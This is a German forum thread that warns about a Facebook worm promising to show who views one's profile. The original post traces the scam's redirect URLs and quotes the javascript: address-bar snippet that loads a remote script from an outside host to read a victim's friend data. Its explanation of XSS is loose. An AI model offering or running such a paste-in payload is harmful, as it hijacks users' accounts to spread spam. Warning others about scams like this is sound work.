[Facebook] Wurm "WOW Jetzt kannst du sehen wer sich dein Profil ansieht!"

[smf]

Hallo,
ich habe in letzter Zeit viele EInladungen von Freunden bekommen welche immer lauteten: "WOW Jetzt kannst du sehen wer sich dein Profil ansieht!"
Nun gut, ich hab gleich an eine Verarsche gedacht, da Facebook soetwas 100% angekündigt hätte und man deswegen keine Einladung bekommen hätte.
Trotzdem, habe ich mich mal weiter geschaut.
Oh was sehe ich da:

Code:

1:
http://216.119.153.147/spy.php

Aha! Eine Website ohne Domain und dann auch noch spy.php, hätte hier nicht eine index.php gereicht, welche nicht noch extra spy.php am ende hat?
Naja nun war mir klar es kann nur ein Wurm sein.
Also weiter geforscht. Die Seite verweist je nach dem in welchem Land man ist auf verschiedene Blogs. Blogs = aha da kann nicht viel passieren wenn sie auf Blogspot sind.
Hier für EN:

Code:

1:
http://who-sees-en.blogspot.com/

Hier für DE:

Code:

1:
http://german-spy.blogspot.com/

Hier für ES:

Code:

1:
http://spanish-landing.blogspot.com/

Im Title findet man "Your CPA Page Redirecting.."
CPA? Ist das uns Online Verdienern nicht bekannt?
Es bedeutet: Cost per Action soviel wie die einmalige Auszahlung einer Provision.
Nun gut. Nicht viel passiert, der Programmierer bekommt Geld durch klciks.
Doch das ist noch nicht alles!
Nun soll man dies in die Adresszeile einfügen:

Code:

1:
2:
3:
javascript: (a = (b = document).createElement(‘script’)).src = ‘//iamedwards.com/german.php?’ + Math.random(),
b.body.appendChild(a);
void(0)

Aha einem Programmierer fällt einem gleich etwas auf: XSS!
Eine XSS ist eine möglichkeit Fremdcode in eine Seite einzubinen. Hacker nutzen dies um ein selbst geschriebenes Script hochzuladen bzw. einzubinden und damit die Daten des Servers auszulesen oder um z.b. Cookies zu stehlen, die der Hacker dann nutzt um sich in Accounts ohne das Passwort einzuloggen.
Dieser Obige Code bindet hier einen Code ein der einem angeblich die Profil Besucher anzeigt. Das Script liest also aus wer die Freunde von einem sind.
Das ganze könnte eig. soweit gehen das es das Passwort auslesen könnte, tut es aber nicht. Der Programmierer oder Hacker ist in diesem sinne ein GreyHat. Er schadet nicht wirklich keinen, nutzt jedoch Schwachstellen aus.
Ein WhiteHat, würde Facebook darauf hinweisen und ein BlackHat die Daten stehlen.
Also erzählt euren Freunden davon, das sie nicht diese Einladung Annehmen sollen und auch sonst auf solch ominösen Tricks rein fallen. Ich selbst kann nicht verstehen das man auf so etwas reinfällt, aber wir sind ja schließlich auf Facebook

[Heidi1978]

Guten Morgen

Vielen Dank für deine Warnung. Also ich habe sie zum Glück immer abgelehnt.

Gruß Heidi

[huskie-style]

Für alle Gutgläubigen und Allesklicker sei dieses empfohlen:

https://www.facebook.com/home.php#!/fakepostings

[funkytown]

Sehr nervig. Sind schon 700.000 Leute darauf reingefallen. Unglaublich. Hier: http://t.co/X69OX97